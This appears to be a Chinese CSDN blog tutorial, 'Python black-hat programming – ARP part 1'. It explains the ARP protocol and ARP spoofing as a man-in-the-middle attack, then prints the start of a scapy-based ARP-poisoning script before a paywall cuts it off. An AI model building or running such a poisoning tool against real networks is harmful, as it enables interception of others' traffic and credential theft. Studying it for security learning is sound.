Python黑帽编程-ARP之一

最新推荐文章于 2023-01-30 21:48:43 发布
VIP文章 最新推荐文章于 2023-01-30 21:48:43 发布
阅读量2.8k 收藏 3
点赞数 1
分类专栏: 网络安全 Python 网络架构 文章标签: python 黑帽 网络安全 arp协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/supercooly/article/details/53956494
版权 
前言:
在知乎上看见这篇文章,正好对网络安全也有些兴趣,于是动手实践一番。
本文作者:微寒
版权声明:转载请私信,并注明原文地址
本文地址:http://blog.csdn.net/supercooly/article/details/53956494
参考文章:https://zhuanlan.zhihu.com/p/24645819
参考文章:http://bbs.ichunqiu.com/thread-13429-1-1.html

一、ARP协议

中文名称:地址解析协议

详细背景及相关知识请参考原文及百度百科。
维基百科

地址解析协议(Address Resolution Protocol),其基本功能为透过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。它是IPv4中网络层必不可少的协议,不过在IPv6中已不再适用,并被邻居发现协议(NDP)所替代。

在以太网协议中规定,同一局域网中的一台主机要和另一台主机进行直接通信,必须要知道目标主机的MAC地址。而在TCP/IP协议中,网络层和传输层只关心目标主机的IP地址。这就导致在以太网中使用IP协议时,数据链路层的以太网协议接到上层IP协议提供的数据中,只包含目的主机的IP地址。于是需要一种方法,根据目的主机的IP地址,获得其MAC地址。这就是ARP协议要做的事情。所谓地址解析(address resolution)就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。

简而言之,在网络架构模型中,TCP/IP协议中只有IP地址,可以通过DNS协议获取。与之类似,网络层协议需要依赖更底层的数据链路层,该层转发数据包并不能识别IP地址,而是直接使用mac地址,所以就需要有个映射关系,这个就是ARP协议。我的理解是,ARP是数据链路层的“DNS”。ARP攻击就是直接定向或者广播自己的mac地址为关键的网络节点,让被攻击机器发送的数据包,发送到攻击机,从而实现中间人攻击。

我们经常听闻的在公共场合连接WIFI有可能遭遇被盗号等危害,其中的一种方式就是ARP攻击,由上面的定义可知,并不需要自己创建一个WIFI而窃取他人信息,只需要在一个局域网中即可。

二、环境

OS:macOS 10.12

Python 3.5

scapy-python3 (pip或easy-install 安装即可)

scapy还需要libnet库支撑,第四节中有详细的安装步骤。

三、Python代码

原文链接

原文是2.X的Python版本,修改为Python3.x版本如下:

#!/usr/bin/python3
import sys
from scapy.all import (
    get_if_hwaddr,
    ARP,
    Ether,
    sendp
)
from scapy.layers.l2 import (
    getmacbyip
)
from optparse import OptionParser
import os


def main():
    try:
        if os.geteuid() != 0:
            print("[-] Run me as root")
            sys.exit(1)
    except Exception as msg:
        print(msg)

    usage = 'Usage: %prog [-i interface] [-t target] host'
    parser = OptionParser(usage)
    parser.add_option('-i', dest='interface', help='Specify the interface to use')
    parser.add_option('-t', dest='target', help='Specify a particular host to ARP poison')
    parser.add_option('-m', dest='mode', default='req',
                      help='Poisoning mode: requests (req) or replies (rep) [default: %default]')
    parser.add_option('-s', action='store_true', dest='summary', default=False,
                      help='Show packet summary and ask for confirmation before poisoning')
    (options, args) = parser.parse_args()
    if len(args) != 1 or options.interface is None:
        parser.print_help()
        sys.exit(0)
    mac = get_if_hwaddr(options.interface)

    def build_req():
        if options.target is None:
            pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], pdst=args[0])
        elif options.target:
            target_mac = getmacbyip(options.target)
            if target_mac is None:
                print("[-] Error: Could not resolve targets MAC address")
                sys.exit(1)
最低0.47元/天 解锁文章
微寒Super
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python黑帽编程 3.4 跨越VLAN详解
09-21
VLAN(Virtual Local Area Network),是基于以太网交互技术构建的虚拟网络,既可以将同一物理网络划分成多个VALN,也可以跨越物理网络...这篇文章主要介绍了Python黑帽编程 3.4 跨越VLAN 的相关资料,需要的朋友参考下
python———scapy库(数据发送
weixin_43803070的博客
05-25 6472
Scapy的是一个强大的交互式数据处理程序(使用python编写)。它能够伪造或者解码大量的网络协议数据,能够发送、捕捉、匹配请求和回复等等。它可以很容易地处理一些典型操作,比如端口扫描,tracerouting,探测,单元测试,攻击或网络发现(可替代hping,NMAP,arpspoof,ARP-SK,arping,tcpdump,tethereal,P0F等)。最重要的他还有很多更优秀的...
Kali Linux渗透测试之端口扫描(二)——僵尸扫描(scapy/python脚本、nmap)
橘子女侠
04-15 1940
僵尸扫描: 条件较为苛刻,首先要能够进行地址欺骗; 其次僵尸机没有什么网络流量产生; 最后僵尸机的ipid必须是递增的(win xp及以前windows机型)闲置系统; 1. 僵尸扫描的过程 Port is Open Port is Closed 僵尸扫描的过程: 1. 扫描者向僵尸机发送SYN/ACK数据,僵尸机会返回一个RST数据,记录下ipid为...
ERROR: Could notfind a version that satisfies the requirement
浪客的博客
01-30 2281
ERROR: Could notfind a version that satisfies the requirement pytorch==1.12.1 (from versions:0.1.2, 1.0.2) ERROR: No matchingdistribution found for pytorch==1.12.1
Scapy脚本执行出现警告WARNING解决办法
Moxiao__墨箫
06-21 4534
安装完scapy,简单写了个脚本执行总是会警告一下:WARNING: No route found for IPv6 destination :: (no default route?)原因是用 from scapy.all import *的时候把ipv6相关的模块也导进去了,ipv6我们用不着,所以这警告不但不起作用,还很讨厌,我们打开scapy安装目录,打开all.py文件, 把与ipv6相关
Kali Linux 渗透测试之主动收集(端口扫描)
weixin_43803070的博客
05-23 1136
** 隐蔽端口扫描: ** 一、我们使用scapy扫描,因为syn发送是在tcp的flag中决定的,所以我们要构造tcp,tcp由ip和tcp头组成。 root@kali:~# scapy WARNING: No route found for IPv6 destination :: (no default route?) Welcome to Scapy (2.3.2) >&gt...
python黑帽编程
03-25
python黑帽编程中文版
Python 黑帽编程 1.1~4.2(玄魂工作室)
03-30
Python 黑帽编程 1.1~4.2(玄魂工作室)
BlackHatPythonPythonProgramming:黑帽Python编程
03-27
BlackHatPythonPythonProgramming:黑帽Python编程
黑帽python第二版(Black Hat Python 2nd Edition)读书笔记 之 第十章 Windows提权(2)Windows令牌权限
阿尔泰野狼的博客
10-29 782
本文记录了博主在阅读Black Hat Python 2nd Edition过程中的心得与踩坑经历。
winpcapy:WinPcap的现代Python装器
05-17
Winpcapy WinPcap的现代Python装器 通过ctypes访问WinPcap。 基于Massimo Ciani的WinPcapy( ) 安装 pip安装winpcapy 用法 快速数据实时日志打印机 >> > from winpcapy import WinPcapUtils # run on the first Ethernert interface and print a log for each packet >> > WinPcapUtils . capture_on_and_print ( "*Ethernet*" ) 16 : 05 : 49 , 624258 len : 199 16 : 05 : 49 , 685950 len : 60 16 : 05 : 49 , 686022 len : 54 16 : 05 : 49 , 767311 len
黑帽python编程数据
10-05
非常好的黑猫编程技术
libdnet-1.11.tar.gz
01-30
非常不错的很是用的可以按炸ungdeyuanma源码程序
Python+OpenCV计算机视觉
12-28
Python+OpenCV计算机视觉系统全面的介绍。
OpenCV-Python图形图像处理:利用黑帽去除图像浅色水印
老猿Python
11-29 3286
本文简单介绍了黑帽的概念、原理和作用,以及OpenCV-Python的具体实现,并提供了两个利用黑帽去除图像水印的案例和一个提取白色图像周边黑色轮廓的案例,通过黑帽的结果图像,再作为mask去与原图像进行运算,即可以得到原图像中去除水印后的亮色图像部分。黑帽运算和顶帽类似,用一个结构元素(核矩阵)通过闭操作从一副图像中删除前景色中比较暗的部分,留下来前景色中相对比较亮的细小部分,就是从图像的亮背景上提取细小的暗物体,黑帽这个特性也可以用于校正不均匀光照的影响。
Python操作cmd命令行,执行arp -a得到设备的MAC地址
qq_39115446的博客
12-09 1926
如图,在命令行中输入arp -a,可以查看物理地址,我只想要192.168.1.1后面的MAC地址 直接上代码: import subprocess ret = subprocess.Popen('arp -a', stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) out1 = ret.stdout.read().decode('gbk') ma
[Python黑帽] 三.编程实现IP及端口扫描器、实现多线程C段扫描器
热门推荐
杨秀璋的专栏
09-17 1万+
Python黑帽第三篇文章将分享网络扫描基础知识,编程实现IP及端口扫描器、实现多线程C段扫描器。本文参考了《Python绝技》书籍和i春秋ADO老师的课程内容,这里真心推荐大家去学习ichunqiu课程,同时也结合作者的编程经验进行讲解。希望这篇基础文章对您有所帮助,更希望大家提高安全意识,也欢迎大家讨论。
snort create_mysql_snort安装
weixin_36050283的博客
02-04 265
本机CentOS6.5最大化安装,以下安装所需组件也是最大化安装之后仍需自己安装的.1.安装libpcap与libpcap-develyum -y install libpcap*2.安装libpcreyum -y install pcre*3.安装libdnet推荐先添加epel源再按装此组件,参考:CentOS6.5 添加epel源yum -y install libdnet*4.下载最新版s...
ERROR: Could not find a version that satisfies the requirement tensorflow==1.12.1
Sun_Raiser的博客
02-13 5130
pip install tensorflow==1.12.1 报错如下 ERROR: Could not find a version that satisfies the requirement tensorflow1.12.1 (from versions: 2.5.0rc0, 2.5.0rc1, 2.5.0rc2, 2.5.0rc3, 2.5.0, 2.5.1, 2. 5.2, 2.5.3, 2.6.0rc0, 2.6.0rc1, 2.6.0rc2, 2.6.0, 2.6.1, 2.6.2, 2.6
开运算opencv-python
最新发布
08-12
- *1* *2* *3* [python-opencv 之开运算、闭运算、形态学梯度、“礼帽”和“黑帽”](https://blog.csdn.net/qq_38505858/article/details/126832149)[target="_blank" data-report-click={"spm":"1018.2226.3001....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值